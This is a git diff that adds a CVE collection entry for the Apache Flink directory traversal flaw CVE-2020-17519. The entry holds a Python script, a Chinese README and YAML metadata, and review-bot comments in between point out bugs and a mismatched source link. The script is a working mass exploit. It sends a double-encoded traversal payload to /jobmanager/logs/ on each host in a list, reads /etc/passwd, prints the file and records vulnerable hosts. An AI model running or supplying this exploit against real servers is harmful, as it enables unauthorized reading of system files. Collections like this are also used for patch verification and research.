diff --git a/cve/apache-Flink/2020/CVE-2020-17519/CVE-2020-17519.py b/cve/apache-Flink/2020/CVE-2020-17519/CVE-2020-17519.py
new file mode 100644
index 0000000000000000000000000000000000000000..826baef1c66df5a88e81636fce5ebbf47fa890f7
--- /dev/null
+++ b/cve/apache-Flink/2020/CVE-2020-17519/CVE-2020-17519.py
@@ -0,0 +1,52 @@
+#!/usr/bin/env python
+# coding:utf-8
+# author:B1anda0
+#affected versions are Apache Flink 1.11.0-1.11.2
+
+import requests,sys,colorama
+from colorama import *
+init(autoreset=True)
+
+
+banner='''\033[1;33;40m
+ _______ ________ ___ ___ ___ ___ __ ______ _____ __ ___
+ / ____\ \ / / ____| |__ \ / _ \__ \ / _ \ /_ |____ | ____/_ |/ _ \
+| | \ \ / /| |__ ______ ) | | | | ) | | | |______| | / /| |__ | | (_) |
+| | \ \/ / | __|______/ /| | | |/ /| | | |______| | / / |___ \ | |\__, |
+| |____ \ / | |____ / /_| |_| / /_| |_| | | | / / ___) || | / /
+ \_____| \/ |______| |____|\___/____|\___/ |_|/_/ |____/ |_| /_/
+'''
+
+
+def verify():
+ headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"}
+ payload= '/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd'
+ poc=urls+payload
+ try:
+ requests.packages.urllib3.disable_warnings()#解决InsecureRequestWarning警告
+ response=requests.get(poc,headers=headers,timeout=15,verify=False)
+ if response.status_code==200 and "root:x" in response.content:
+ print(u'\033[1;31;40m[+]{} is apache flink directory traversal vulnerability'.format(urls))
+ print(response.content)
+ #将漏洞地址输出在Vul.txt中
+ f=open('./vul.txt','a')
+ f.write(urls)
+ f.write('\n')
+ else:
+ print('\033[1;32;40m[-]{} None'.format(urls))
+ except:
+ print('{} request timeout'.format(urls))
+
+
+if __name__ == '__main__':
+ print (banner)
+ if len(sys.argv)!=2:
+ print('Example:python CVE-2020-17519.py urls.txt')
+ else:
+ file = open(sys.argv[1])
+ for url in file.readlines():
+ urls=url.strip()
+ if urls[-1]=='/':
+ urls=urls[:-1]
+ verify()
+ print ('Check Over')
diff --git a/cve/apache-Flink/2020/CVE-2020-17519/README.md b/cve/apache-Flink/2020/CVE-2020-17519/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..0ba52e8884476df22aacf540a1504a3a9630ce82
--- /dev/null
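Review bot: In `verify()`, the bare `except:` labels every failure as "request timeout", so the result list cannot be trusted for triage: on Python 3 `"root:x" in response.content` tests a str against bytes and raises TypeError, which would be swallowed and reported as a timeout for a host that actually answered. Compare against decoded text and catch only transport errors, e.g. `if response.status_code == 200 and "root:x" in response.text:` and `except requests.RequestException as exc:`. The handle from `open('./vul.txt','a')` is never closed (a `with open(...) as f:` block would fix that), and a blank line in the input file makes `urls[-1]` raise IndexError in the `__main__` loop before `verify()` is reached. `print(response.content)` also echoes the retrieved file into the terminal and any captured log; recording only the affected host is enough for a finding.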
+++ b/cve/apache-Flink/2020/CVE-2020-17519/README.md
@@ -0,0 +1,10 @@
+# Flink-目录遍历
+Apache Flink 目录遍历
+#Use
+Apache Flink是美国阿帕奇软件(Apache)基金会的一款开源的分布式流数据处理引擎。该产品主要使用Java和Scala语言编写。Apache Flink 版本 1.11.0 至 版本1.11.2 存在安全漏洞,该漏洞允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。
+
+# eg
+python CVE-2020-17519.py urls.txt
+
+# reference
+code from: https://github.com/B1anda0/CVE-2020-17519
diff --git a/cve/apache-Flink/2020/yaml/CVE-2020-17519.yaml b/cve/apache-Flink/2020/yaml/CVE-2020-17519.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..2d7573ce353ecef7a929d63d548ff5df624f7354
--- /dev/null
+++ b/cve/apache-Flink/2020/yaml/CVE-2020-17519.yaml
@@ -0,0 +1,19 @@
+id: CVE-2020-17519
+source: https://github.com/Henry4E36/Solr-SSRF
+info:
+ name: Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。
+ severity: high
+ description:
+ Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.2中发布)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。
+ scope-of-influence:
+ Apache Flink = 1.11.0, Apache Flink = 1.11.1, Apache Flink = 1.11.2
+ reference:
+ - https://nvd.nist.gov/vuln/detail/cve-2020-17519
+ - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2020-17519
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2020-17519
+ cnnvd-id: CNNVD-202101-271
+ kve-id: None
+ tags: cve2020,Apache,Flink,Directory traversal
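Review bot: The `source:` field points at `https://github.com/Henry4E36/Solr-SSRF`, which does not match this entry: the README added in the same commit credits `https://github.com/B1anda0/CVE-2020-17519`, and the script's `# author:` line names the same account. It looks like a copy-paste from another entry, and `source: https://github.com/B1anda0/CVE-2020-17519` would keep the provenance of the bundled code traceable. `info.name` also holds a product description rather than a name for the vulnerability, and the entry records no remediation, so consumers of this metadata get no pointer to a fixed release.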